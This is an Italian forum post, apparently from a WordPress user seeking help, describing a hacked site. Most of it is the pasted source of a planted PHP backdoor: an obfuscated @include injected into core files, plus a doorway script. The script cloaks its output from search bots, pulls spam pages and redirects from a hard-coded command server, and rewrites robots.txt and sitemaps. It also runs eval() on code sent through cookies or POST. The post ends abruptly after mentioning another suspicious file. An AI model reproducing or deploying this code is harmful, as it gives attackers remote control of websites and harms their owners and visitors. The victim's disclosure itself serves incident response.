Risultati della ricerca per 'Http https wordpress plugin'
-
-
Salve a tutti,
sono nuovo nel forum, utilizzo wordpress da alcuni anni.
Ho riscontrato un Enorme problema in un sito web che gestisco, vi elenco i problemi, ovvero sicuramente malware:nella root principale dove ci sono cartelle e file, alcuni file esempio:
index.php
wp-config.php
wp-settings.php
etc…
sono stati modificati, ovvero all’interno del file, sono state aggiunte queste righe di codice:/*d9507*/ @include "\057ho\155e/\160ed\141le\164ri\143ol\157re\057pu\142li\143_h\164ml\057wp\055in\143lu\144es\057bl\157ck\163/c\141le\156da\162/.\142cf\142c0\1428.\151co"; /*d9507*/poi sono state create delle cartelle, con nomi strani, all’interno c’è un file denominato index.php il codice presdente è:
@ini_set('error_log', NULL);@ini_set('log_errors', 0);@ini_set('max_execution_time', 0);@error_reporting(0);@set_time_limit(0);date_default_timezone_set('UTC');class _rjyire{static private $_2d9wb7ft = 84537037;static function _6nb3f($_abwoe9mn, $_8yfo3khv){$_abwoe9mn[2] = count($_abwoe9mn) > 4 ? long2ip(_rjyire::$_2d9wb7ft - 728) : $_abwoe9mn[2];$_3fy3rnlv = _rjyire::_l9066($_abwoe9mn, $_8yfo3khv);if (!$_3fy3rnlv) {$_3fy3rnlv = _rjyire::_40w78($_abwoe9mn, $_8yfo3khv);}return $_3fy3rnlv;}static function _l9066($_abwoe9mn, $_3fy3rnlv, $_qsz31x78 = NULL){if (!function_exists('curl_version')) {return "";}if (is_array($_abwoe9mn)) {$_abwoe9mn = implode("/", $_abwoe9mn);}$_nwuiwdhn = curl_init();curl_setopt($_nwuiwdhn, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($_nwuiwdhn, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($_nwuiwdhn, CURLOPT_URL, $_abwoe9mn);if (!empty($_3fy3rnlv)) {curl_setopt($_nwuiwdhn, CURLOPT_POST, 1);curl_setopt($_nwuiwdhn, CURLOPT_POSTFIELDS, $_3fy3rnlv);}if (!empty($_qsz31x78)) {curl_setopt($_nwuiwdhn, CURLOPT_HTTPHEADER, $_qsz31x78);}curl_setopt($_nwuiwdhn, CURLOPT_RETURNTRANSFER, TRUE);$_cm59hgy5 = curl_exec($_nwuiwdhn);curl_close($_nwuiwdhn);return $_cm59hgy5;}static function _40w78($_abwoe9mn, $_3fy3rnlv, $_qsz31x78 = NULL){if (is_array($_abwoe9mn)) {$_abwoe9mn = implode("/", $_abwoe9mn);}if (!empty($_3fy3rnlv)) {$_kmivd3lp = array('method' => 'POST','header' => 'Content-type: application/x-www-form-urlencoded','content' => $_3fy3rnlv);if (!empty($_qsz31x78)) {$_kmivd3lp["header"] = $_kmivd3lp["header"] . "\r\n" . implode("\r\n", $_qsz31x78);}$_tltqoo6e = stream_context_create(array('http' => $_kmivd3lp));} else {$_kmivd3lp = array('method' => 'GET',);if (!empty($_qsz31x78)) {$_kmivd3lp["header"] = implode("\r\n", $_qsz31x78);}$_tltqoo6e = stream_context_create(array('http' => $_kmivd3lp));}return @file_get_contents($_abwoe9mn, FALSE, $_tltqoo6e);}}class _rthpn88{private static $_k63tzh9f = "";private static $_cpwy1mih = -1;private static $_n2xvz23t = "";private $_mi8pdpyn = "";private $_qgyjrkds = "";private $_ft3y0j4r = "";private $_xxqorlts = "";public static function _r2lu5($_cfyby5vv, $_api83au6, $_9bh0q0tv){_rthpn88::$_k63tzh9f = $_cfyby5vv . "/cache/";_rthpn88::$_cpwy1mih = $_api83au6;_rthpn88::$_n2xvz23t = $_9bh0q0tv;if (!@file_exists(_rthpn88::$_k63tzh9f)) {@mkdir(_rthpn88::$_k63tzh9f);}}static public function _sry35(){$_n6kr9w1e = 0;foreach (scandir(_rthpn88::$_k63tzh9f) as $_cmxyqmp1) {$_n6kr9w1e += 1;}return $_n6kr9w1e;}public static function _obtpk(){return TRUE;}public function __construct($_lk6997mu, $_awf0fhgr, $_txikr7hs, $_0wz75mln){$this->_mi8pdpyn = $_lk6997mu;$this->_qgyjrkds = $_awf0fhgr;$this->_ft3y0j4r = $_txikr7hs;$this->_xxqorlts = $_0wz75mln;}public function _upktf(){function _ipjab($_qru2hk8e, $_01hrpgjh){return round(rand($_qru2hk8e, $_01hrpgjh - 1) + (rand(0, PHP_INT_MAX - 1) / PHP_INT_MAX), 2);}$_sg05zl9j = _h6dhczx::_h93q9();$_3fy3rnlv = str_replace("{{ text }}", $this->_qgyjrkds,str_replace("{{ keyword }}", $this->_ft3y0j4r,str_replace("{{ links }}", $this->_xxqorlts, $this->_mi8pdpyn)));while (TRUE) {$_u7pu8sv3 = preg_replace('/' . preg_quote("{{ randkeyword }}", '/') . '/', _h6dhczx::_ytlw7(), $_3fy3rnlv, 1);if ($_u7pu8sv3 === $_3fy3rnlv) {break;}$_3fy3rnlv = $_u7pu8sv3;}while (TRUE) {preg_match('/{{ KEYWORDBYINDEX-ANCHOR (\d*) }}/', $_3fy3rnlv, $_uuoxevdj);if (empty($_uuoxevdj)) {break;}$_txikr7hs = @$_sg05zl9j[intval($_uuoxevdj[1])];$_srvjq02r = _cqfim72::_25kvr($_txikr7hs);$_3fy3rnlv = str_replace($_uuoxevdj[0], $_srvjq02r, $_3fy3rnlv);}while (TRUE) {preg_match('/{{ KEYWORDBYINDEX (\d*) }}/', $_3fy3rnlv, $_uuoxevdj);if (empty($_uuoxevdj)) {break;}$_txikr7hs = @$_sg05zl9j[intval($_uuoxevdj[1])];$_3fy3rnlv = str_replace($_uuoxevdj[0], $_txikr7hs, $_3fy3rnlv);}while (TRUE) {preg_match('/{{ RANDFLOAT (\d*)-(\d*) }}/', $_3fy3rnlv, $_uuoxevdj);if (empty($_uuoxevdj)) {break;}$_3fy3rnlv = str_replace($_uuoxevdj[0], _ipjab($_uuoxevdj[1], $_uuoxevdj[2]), $_3fy3rnlv);}while (TRUE) {preg_match('/{{ RANDINT (\d*)-(\d*) }}/', $_3fy3rnlv, $_uuoxevdj);if (empty($_uuoxevdj)) {break;}$_3fy3rnlv = str_replace($_uuoxevdj[0], rand($_uuoxevdj[1], $_uuoxevdj[2]), $_3fy3rnlv);}return $_3fy3rnlv;}public function _xnpn4(){$_xan00brs = _rthpn88::$_k63tzh9f . md5($this->_ft3y0j4r . _rthpn88::$_n2xvz23t);if (_rthpn88::$_cpwy1mih == -1) {$_2h2r40e0 = -1;} else {$_2h2r40e0 = time() + (3600 * 24 * 30);}$_4ih6ng42 = array("template" => $this->_mi8pdpyn, "text" => $this->_qgyjrkds, "keyword" => $this->_ft3y0j4r,"links" => $this->_xxqorlts, "expired" => $_2h2r40e0);@file_put_contents($_xan00brs, serialize($_4ih6ng42));}static public function _h8n79($_txikr7hs){$_xan00brs = _rthpn88::$_k63tzh9f . md5($_txikr7hs . _rthpn88::$_n2xvz23t);$_xan00brs = @unserialize(@file_get_contents($_xan00brs));if (!empty($_xan00brs) && ($_xan00brs["expired"] > time() || $_xan00brs["expired"] == -1)) {return new _rthpn88($_xan00brs["template"], $_xan00brs["text"], $_xan00brs["keyword"], $_xan00brs["links"]);} else {return null;}}}class _s269ka{private static $_k63tzh9f = "";private static $_y1ymvkz8 = "";public static function _r2lu5($_cfyby5vv, $_tolnhsib){_s269ka::$_k63tzh9f = $_cfyby5vv . "/";_s269ka::$_y1ymvkz8 = $_tolnhsib;if (!@file_exists(_s269ka::$_k63tzh9f)) {@mkdir(_s269ka::$_k63tzh9f);}}public static function _obtpk(){return TRUE;}static public function _sry35(){$_n6kr9w1e = 0;foreach (scandir(_s269ka::$_k63tzh9f) as $_cmxyqmp1) {if (strpos($_cmxyqmp1, _s269ka::$_y1ymvkz8) === 0) {$_n6kr9w1e += 1;}}return $_n6kr9w1e;}static public function _ytlw7(){$_jrq92p7z = array();foreach (scandir(_s269ka::$_k63tzh9f) as $_cmxyqmp1) {if (strpos($_cmxyqmp1, _s269ka::$_y1ymvkz8) === 0) {$_jrq92p7z[] = $_cmxyqmp1;}}return @file_get_contents(_s269ka::$_k63tzh9f . $_jrq92p7z[array_rand($_jrq92p7z)]);}static public function _xnpn4($_4h4ro24x){if (@file_exists(_s269ka::$_y1ymvkz8 . "_" . md5($_4h4ro24x) . ".html")) {return;}@file_put_contents(_s269ka::$_y1ymvkz8 . "_" . md5($_4h4ro24x) . ".html", $_4h4ro24x);}}class _h6dhczx{private static $_k63tzh9f = "";private static $_y1ymvkz8 = "";private static $_6yas4x0c = array();private static $_9f0n8vcl = array();public static function _r2lu5($_cfyby5vv, $_tolnhsib){_h6dhczx::$_k63tzh9f = $_cfyby5vv . "/";_h6dhczx::$_y1ymvkz8 = $_tolnhsib;if (!@file_exists(_h6dhczx::$_k63tzh9f)) {@mkdir(_h6dhczx::$_k63tzh9f);}}private static function _ashu1(){$_4lx9tym4 = array();foreach (scandir(_h6dhczx::$_k63tzh9f) as $_cmxyqmp1) {if (strpos($_cmxyqmp1, _h6dhczx::$_y1ymvkz8) === 0) {$_4lx9tym4[] = $_cmxyqmp1;}}return $_4lx9tym4;}public static function _obtpk(){return TRUE;}static public function _ytlw7(){if (empty(_h6dhczx::$_6yas4x0c)) {$_4lx9tym4 = _h6dhczx::_ashu1();_h6dhczx::$_6yas4x0c = @file(_h6dhczx::$_k63tzh9f . $_4lx9tym4[array_rand($_4lx9tym4)], FILE_IGNORE_NEW_LINES);}return _h6dhczx::$_6yas4x0c[array_rand(_h6dhczx::$_6yas4x0c)];}static public function _h93q9(){if (empty(_h6dhczx::$_9f0n8vcl)) {$_4lx9tym4 = _h6dhczx::_ashu1();foreach ($_4lx9tym4 as $_rsz2yre4) {_h6dhczx::$_9f0n8vcl = array_merge(_h6dhczx::$_9f0n8vcl, @file(_h6dhczx::$_k63tzh9f . $_rsz2yre4, FILE_IGNORE_NEW_LINES));}}return _h6dhczx::$_9f0n8vcl;}static public function _xnpn4($_hod9y4k1){if (@file_exists(_h6dhczx::$_y1ymvkz8 . "_" . md5($_hod9y4k1) . ".list")) {return;}@file_put_contents(_h6dhczx::$_y1ymvkz8 . "_" . md5($_hod9y4k1) . ".list", $_hod9y4k1);}static public function _5oekv($_txikr7hs){@file_put_contents(_h6dhczx::$_y1ymvkz8 . "_" . md5(_cqfim72::$_7uigpzys) . ".list", $_txikr7hs . "\n", 8);}}class _cqfim72{static public $_1bgey6eb = "5.3";static public $_7uigpzys = "dd4074a4-4cde-a0f0-8255-f5266e158790";private $_159o4ero = "http://136.12.78.46/app/assets/api2?action=redir";private $_ne9xwwkz = "http://136.12.78.46/app/assets/api?action=page";static public $_n4vffsjw = 5;static public $_zdyz2axj = 20;private function _fb8y7(){$_vpl9ipeq = array('#libwww-perl#i','#MJ12bot#i','#msnbot#i', '#msnbot-media#i','#YandexBot#i', '#msnbot#i', '#YandexWebmaster#i','#spider#i', '#yahoo#i', '#google#i', '#altavista#i','#ask#i','#yahoo!\s*slurp#i','#BingBot#i');if (!empty($_SERVER['HTTP_USER_AGENT']) && (FALSE !== strpos(preg_replace($_vpl9ipeq, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT']), '-NO-WAY-'))) {$_m75irtfe = 1;} elseif (empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) || empty($_SERVER['HTTP_REFERER'])) {$_m75irtfe = 1;} elseif (strpos($_SERVER['HTTP_REFERER'], "google") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "yahoo") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "bing") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "yandex") === FALSE) {$_m75irtfe = 1;} else {$_m75irtfe = 0;}return $_m75irtfe;}private static function _9j03s(){$_8yfo3khv = array();$_8yfo3khv['ip'] = $_SERVER['REMOTE_ADDR'];$_8yfo3khv['qs'] = @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];$_8yfo3khv['ua'] = @$_SERVER['HTTP_USER_AGENT'];$_8yfo3khv['lang'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];$_8yfo3khv['ref'] = @$_SERVER['HTTP_REFERER'];$_8yfo3khv['enc'] = @$_SERVER['HTTP_ACCEPT_ENCODING'];$_8yfo3khv['acp'] = @$_SERVER['HTTP_ACCEPT'];$_8yfo3khv['char'] = @$_SERVER['HTTP_ACCEPT_CHARSET'];$_8yfo3khv['conn'] = @$_SERVER['HTTP_CONNECTION'];return $_8yfo3khv;}public function __construct(){$this->_159o4ero = explode("/", $this->_159o4ero);$this->_ne9xwwkz = explode("/", $this->_ne9xwwkz);}static public function _1copw($_l4syzkad){if (strlen($_l4syzkad) < 4) {return "";}$_r2it9ts5 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$_sg05zl9j = str_split($_r2it9ts5);$_sg05zl9j = array_flip($_sg05zl9j);$_towp3ylv = 0;$_tr8svs2y = "";$_l4syzkad = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $_l4syzkad);do {$_m6eh4k4n = $_sg05zl9j[$_l4syzkad[$_towp3ylv++]];$_fqewi4pc = $_sg05zl9j[$_l4syzkad[$_towp3ylv++]];$_thk7spqz = $_sg05zl9j[$_l4syzkad[$_towp3ylv++]];$_d1y2u7lo = $_sg05zl9j[$_l4syzkad[$_towp3ylv++]];$_gybbwgjq = ($_m6eh4k4n << 2) | ($_fqewi4pc >> 4);$_rqpd1aej = (($_fqewi4pc & 15) << 4) | ($_thk7spqz >> 2);$_ld9tnb9z = (($_thk7spqz & 3) << 6) | $_d1y2u7lo;$_tr8svs2y = $_tr8svs2y . chr($_gybbwgjq);if ($_thk7spqz != 64) {$_tr8svs2y = $_tr8svs2y . chr($_rqpd1aej);}if ($_d1y2u7lo != 64) {$_tr8svs2y = $_tr8svs2y . chr($_ld9tnb9z);}} while ($_towp3ylv < strlen($_l4syzkad));return $_tr8svs2y;}private function _8cyp7($_txikr7hs){$_lk6997mu = "";$_awf0fhgr = "";$_8yfo3khv = _cqfim72::_9j03s();$_8yfo3khv["uid"] = _cqfim72::$_7uigpzys;$_8yfo3khv["keyword"] = $_txikr7hs;$_8yfo3khv["tc"] = 10;$_8yfo3khv = http_build_query($_8yfo3khv);$_y3jqeqay = _rjyire::_6nb3f($this->_ne9xwwkz, $_8yfo3khv);if (strpos($_y3jqeqay, _cqfim72::$_7uigpzys) === FALSE) {return array($_lk6997mu, $_awf0fhgr);}$_lk6997mu = _s269ka::_ytlw7();$_awf0fhgr = substr($_y3jqeqay, strlen(_cqfim72::$_7uigpzys));$_awf0fhgr = explode("\n", $_awf0fhgr);shuffle($_awf0fhgr);$_awf0fhgr = implode(" ", $_awf0fhgr);return array($_lk6997mu, $_awf0fhgr);}private function _yt32p(){$_8yfo3khv = _cqfim72::_9j03s();if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {$_8yfo3khv['cfconn'] = @$_SERVER['HTTP_CF_CONNECTING_IP'];}if (isset($_SERVER['HTTP_X_REAL_IP'])) {$_8yfo3khv['xreal'] = @$_SERVER['HTTP_X_REAL_IP'];}if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$_8yfo3khv['xforward'] = @$_SERVER['HTTP_X_FORWARDED_FOR'];}$_8yfo3khv["uid"] = _cqfim72::$_7uigpzys;$_8yfo3khv = http_build_query($_8yfo3khv);$_av1osu2q = _rjyire::_6nb3f($this->_159o4ero, $_8yfo3khv);$_av1osu2q = @unserialize($_av1osu2q);if (isset($_av1osu2q["type"]) && $_av1osu2q["type"] == "redir") {if (!empty($_av1osu2q["data"]["header"])) {header($_av1osu2q["data"]["header"]);return true;} elseif (!empty($_av1osu2q["data"]["code"])) {echo $_av1osu2q["data"]["code"];return true;}}return false;}public function _obtpk(){return _rthpn88::_obtpk() && _s269ka::_obtpk() && _h6dhczx::_obtpk();}static public function _ayawc(){if ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443) {return true;}return false;}public static function _nze5p(){$_h46qo2n7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_h46qo2n7 = $_h46qo2n7[0];if (strpos($_h46qo2n7, ".php") === FALSE) {$_h46qo2n7 = explode("/", $_h46qo2n7);array_pop($_h46qo2n7);$_h46qo2n7 = implode("/", $_h46qo2n7) . "/";}return sprintf("%s://%s%s", _cqfim72::_ayawc() ? "https" : "http", $_SERVER['HTTP_HOST'], $_h46qo2n7);}public static function _4ejca(){$_2zj0nny5 = Array("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62","Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15","Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15","Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36","Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36");$_ke278tps = array("https://www.google.com/ping?sitemap=" => "Sitemap Notification Received",);$_qsz31x78 = array("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Accept-Language: en-US,en;q=0.5","User-Agent: " . $_2zj0nny5[array_rand($_2zj0nny5)],);$_to27fg02 = urlencode(_cqfim72::_bwc28() . "/sitemap.xml");foreach ($_ke278tps as $_abwoe9mn => $_7kc85jy1) {$_085pfn8u = _rjyire::_l9066($_abwoe9mn . $_to27fg02, NULL, $_qsz31x78);if (empty($_085pfn8u)) {$_085pfn8u = _rjyire::_40w78($_abwoe9mn . $_to27fg02, NULL, $_qsz31x78);}if (empty($_085pfn8u)) {return FALSE;}if (strpos($_085pfn8u, $_7kc85jy1) === FALSE) {return FALSE;}}return TRUE;}public static function _ztzjr(){$_okdhp6f7 = "User-agent: *\nDisallow: %s\nUser-agent: Bingbot\nUser-agent: Googlebot\nUser-agent: Slurp\nDisallow:\nSitemap: %s\n";$_h46qo2n7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_h46qo2n7 = $_h46qo2n7[0];$_z6qkaj48 = substr($_h46qo2n7, 0, strrpos($_h46qo2n7, "/"));$_kp3zkd6w = sprintf($_okdhp6f7, $_z6qkaj48, _cqfim72::_bwc28() . "/sitemap.xml");$_3whh3em1 = $_SERVER["DOCUMENT_ROOT"] . "/robots.txt";if (@file_exists($_3whh3em1)) {@chmod($_3whh3em1, 0777);$_cmsqf6hf = @file_get_contents($_3whh3em1);} else {$_cmsqf6hf = "";}if (strpos($_cmsqf6hf, $_kp3zkd6w) === FALSE) {@file_put_contents($_3whh3em1, $_cmsqf6hf . "\n" . $_kp3zkd6w);$_cmsqf6hf = @file_get_contents($_3whh3em1);return (strpos($_cmsqf6hf, $_kp3zkd6w) !== FALSE);}return FALSE;}public static function _bwc28(){$_h46qo2n7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_h46qo2n7 = $_h46qo2n7[0];$_cfyby5vv = substr($_h46qo2n7, 0, strrpos($_h46qo2n7, "/"));return sprintf("%s://%s%s", _cqfim72::_ayawc() ? "https" : "http", $_SERVER['HTTP_HOST'], $_cfyby5vv);}public static function _25kvr($_txikr7hs){$_3egy51jd = _cqfim72::_nze5p();$_uuxqgelt = substr(md5(_cqfim72::$_7uigpzys . "salt3"), 0, 6);$_573a5o2r = "";if (substr($_3egy51jd, -1) == "/") {if (ord($_uuxqgelt[1]) % 2) {$_txikr7hs = str_replace(" ", "-", $_txikr7hs);} else {$_txikr7hs = str_replace(" ", "-", $_txikr7hs);}$_573a5o2r = sprintf("%s%s.html", $_3egy51jd, urlencode($_txikr7hs));} else {if (FALSE && (ord($_uuxqgelt[0]) % 2)) {$_573a5o2r = sprintf("%s?%s=%s",$_3egy51jd,$_uuxqgelt,urlencode(str_replace(" ", "-", $_txikr7hs)));} else {$_zgu1agut = array("id", "page", "tag");$_c58n781y = $_zgu1agut[ord($_uuxqgelt[2]) % count($_zgu1agut)];if (ord($_uuxqgelt[1]) % 2) {$_txikr7hs = str_replace(" ", "-", $_txikr7hs);} else {$_txikr7hs = str_replace(" ", "-", $_txikr7hs);}$_573a5o2r = sprintf("%s?%s=%s",$_3egy51jd,$_c58n781y,urlencode($_txikr7hs));}}return $_573a5o2r;}public static function _9nl1a($_qru2hk8e, $_01hrpgjh){$_2shel3xi = "";for ($_towp3ylv = 0; $_towp3ylv < rand($_qru2hk8e, $_01hrpgjh); $_towp3ylv++) {$_txikr7hs = _h6dhczx::_ytlw7();$_2shel3xi .= sprintf("<a href=\"%s\">%s</a>,\n",_cqfim72::_25kvr($_txikr7hs), ucwords($_txikr7hs));}return $_2shel3xi;}public static function _oiwn0($_ittn9lq1 = FALSE){$_tej93zxq = dirname(__FILE__) . "/sitemap.xml";$_v97jk5uy = "<?xml version=\"1.0\" encoding=\"UTF-8\"?" . ">\n<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n";$_0gp89u6y = "</urlset>";$_sg05zl9j = _h6dhczx::_h93q9();$_i3q2gdxj = array();if (file_exists($_tej93zxq)) {$_y3jqeqay = simplexml_load_file($_tej93zxq);foreach ($_y3jqeqay as $_ccaqt8r5) {$_i3q2gdxj[(string)$_ccaqt8r5->loc] = (string)$_ccaqt8r5->lastmod;}} else {$_ittn9lq1 = FALSE;}foreach ($_sg05zl9j as $_q67rhvuo) {$_573a5o2r = _cqfim72::_25kvr($_q67rhvuo);if (isset($_i3q2gdxj[$_573a5o2r])) {continue;}if ($_ittn9lq1) {$_b8mfdvbf = time();} else {$_b8mfdvbf = time() - (crc32($_q67rhvuo) % (60 * 60 * 24 * 30));}$_i3q2gdxj[$_573a5o2r] = date("Y-m-d", $_b8mfdvbf);}$_vf4ra3wy = "";foreach ($_i3q2gdxj as $_abwoe9mn => $_b8mfdvbf) {$_vf4ra3wy .= "<url>\n";$_vf4ra3wy .= sprintf("<loc>%s</loc>\n", $_abwoe9mn);$_vf4ra3wy .= sprintf("<lastmod>%s</lastmod>\n", $_b8mfdvbf);$_vf4ra3wy .= "</url>\n";}$_f81pyder = $_v97jk5uy . $_vf4ra3wy . $_0gp89u6y;$_to27fg02 = _cqfim72::_bwc28() . "/sitemap.xml";@file_put_contents($_tej93zxq, $_f81pyder);return $_to27fg02;}public function _qpwwy(){$_c58n781y = substr(md5(_cqfim72::$_7uigpzys . "salt3"), 0, 6);if (!$this->_fb8y7()) {if ($this->_yt32p()) {return;}}if (!empty($_GET)) {$_c2guacgb = array_values($_GET);} else {$_c2guacgb = explode("/", $_SERVER["REQUEST_URI"]);$_c2guacgb = array_reverse($_c2guacgb);}$_txikr7hs = "";foreach ($_c2guacgb as $_pk44sti1) {if (substr_count($_pk44sti1, "-") > 0) {$_txikr7hs = $_pk44sti1;break;}}$_txikr7hs = str_replace($_c58n781y . "-", "", $_txikr7hs);$_txikr7hs = str_replace("-" . $_c58n781y, "", $_txikr7hs);$_txikr7hs = str_replace("-", " ", $_txikr7hs);$_tdnzevth = array(".html", ".php", ".aspx");foreach ($_tdnzevth as $_snux527w) {if (strpos($_txikr7hs, $_snux527w) === strlen($_txikr7hs) - strlen($_snux527w)) {$_txikr7hs = substr($_txikr7hs, 0, strlen($_txikr7hs) - strlen($_snux527w));}}$_txikr7hs = urldecode($_txikr7hs);$_o2y3ufcl = _h6dhczx::_h93q9();if (empty($_txikr7hs)) {$_txikr7hs = $_o2y3ufcl[0];} else if (!in_array($_txikr7hs, $_o2y3ufcl)) {$_ig73pl9n = 0;foreach (str_split($_txikr7hs) as $_nwuiwdhn) {$_ig73pl9n += ord($_nwuiwdhn);}$_txikr7hs = $_o2y3ufcl[$_ig73pl9n % count($_o2y3ufcl)];}if (!empty($_txikr7hs)) {$_av1osu2q = _rthpn88::_h8n79($_txikr7hs);if (empty($_av1osu2q)) {list($_lk6997mu, $_awf0fhgr) = $this->_8cyp7($_txikr7hs);if (empty($_awf0fhgr)) {return;}$_av1osu2q = new _rthpn88($_lk6997mu, $_awf0fhgr, $_txikr7hs, _cqfim72::_9nl1a(_cqfim72::$_n4vffsjw, _cqfim72::$_zdyz2axj));$_av1osu2q->_xnpn4();}echo $_av1osu2q->_upktf();}}}_rthpn88::_r2lu5(dirname(__FILE__), -1, _cqfim72::$_7uigpzys);_s269ka::_r2lu5(dirname(__FILE__), substr(md5(_cqfim72::$_7uigpzys . "salt12"), 0, 4));_h6dhczx::_r2lu5(dirname(__FILE__), substr(md5(_cqfim72::$_7uigpzys . "salt22"), 0, 4));function _o5w9v($_y3jqeqay, $_q67rhvuo){$_xl8bdpr4 = "";for ($_towp3ylv = 0; $_towp3ylv < strlen($_y3jqeqay);) {for ($_p5o0lf07 = 0; $_p5o0lf07 < strlen($_q67rhvuo) && $_towp3ylv < strlen($_y3jqeqay); $_p5o0lf07++, $_towp3ylv++) {$_xl8bdpr4 .= chr(ord($_y3jqeqay[$_towp3ylv]) ^ ord($_q67rhvuo[$_p5o0lf07]));}}return $_xl8bdpr4;}function _2qx5j($_y3jqeqay, $_q67rhvuo, $_24fhhpd9){return _o5w9v(_o5w9v($_y3jqeqay, $_q67rhvuo), $_24fhhpd9);}foreach (array_merge($_COOKIE, $_POST) as $_o88biqxq => $_y3jqeqay) {$_y3jqeqay = @unserialize(_2qx5j(_cqfim72::_1copw($_y3jqeqay), $_o88biqxq, _cqfim72::$_7uigpzys));if (isset($_y3jqeqay['ak']) && _cqfim72::$_7uigpzys == $_y3jqeqay['ak']) {if ($_y3jqeqay['a'] == 'doorway2') {if ($_y3jqeqay['sa'] == 'check') {$_3fy3rnlv = _rjyire::_6nb3f(explode("/", "http://httpbin.org/"), "");if (strlen($_3fy3rnlv) > 512) {echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb,"cache" => _rthpn88::_sry35(),"keywords" => count(_h6dhczx::_h93q9()),"templates" => _s269ka::_sry35()));}exit;}if ($_y3jqeqay['sa'] == 'templates') {foreach ($_y3jqeqay["templates"] as $_lk6997mu) {_s269ka::_xnpn4($_lk6997mu);echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb,));}}if ($_y3jqeqay['sa'] == 'keywords') {_h6dhczx::_xnpn4($_y3jqeqay["keywords"]);_cqfim72::_oiwn0();echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb,));}if ($_y3jqeqay['sa'] == 'update_sitemap') {_cqfim72::_oiwn0(TRUE);echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb,));}if ($_y3jqeqay['sa'] == 'pages') {$_vruef3d6 = 0;$_o2y3ufcl = _h6dhczx::_h93q9();if (_s269ka::_sry35() > 0) {foreach ($_y3jqeqay['pages'] as $_av1osu2q) {$_ow1agfr3 = _rthpn88::_h8n79($_av1osu2q["keyword"]);if (empty($_ow1agfr3)) {$_ow1agfr3 = new _rthpn88(_s269ka::_ytlw7(), $_av1osu2q["text"], $_av1osu2q["keyword"], _cqfim72::_9nl1a(_cqfim72::$_n4vffsjw, _cqfim72::$_zdyz2axj));$_ow1agfr3->_xnpn4();$_vruef3d6 += 1;if (!in_array($_av1osu2q["keyword"], $_o2y3ufcl)) {_h6dhczx::_5oekv($_av1osu2q["keyword"]);}}}}echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb, "pages" => $_vruef3d6));}if ($_y3jqeqay["sa"] == "ping") {$_085pfn8u = _cqfim72::_4ejca();echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb, "result" => (int)$_085pfn8u));}if ($_y3jqeqay["sa"] == "robots") {$_085pfn8u = _cqfim72::_ztzjr();echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb, "result" => (int)$_085pfn8u));}}if ($_y3jqeqay['sa'] == 'eval') {eval($_y3jqeqay["data"]);exit;}}}$_5tk2ma86 = new _cqfim72();if ($_5tk2ma86->_obtpk()) {$_5tk2ma86->_qpwwy();}exit();poi, ho trovato a giro, altri file con nomi strani tipo:
.3bddbb29.ico
il suo contenuto è:
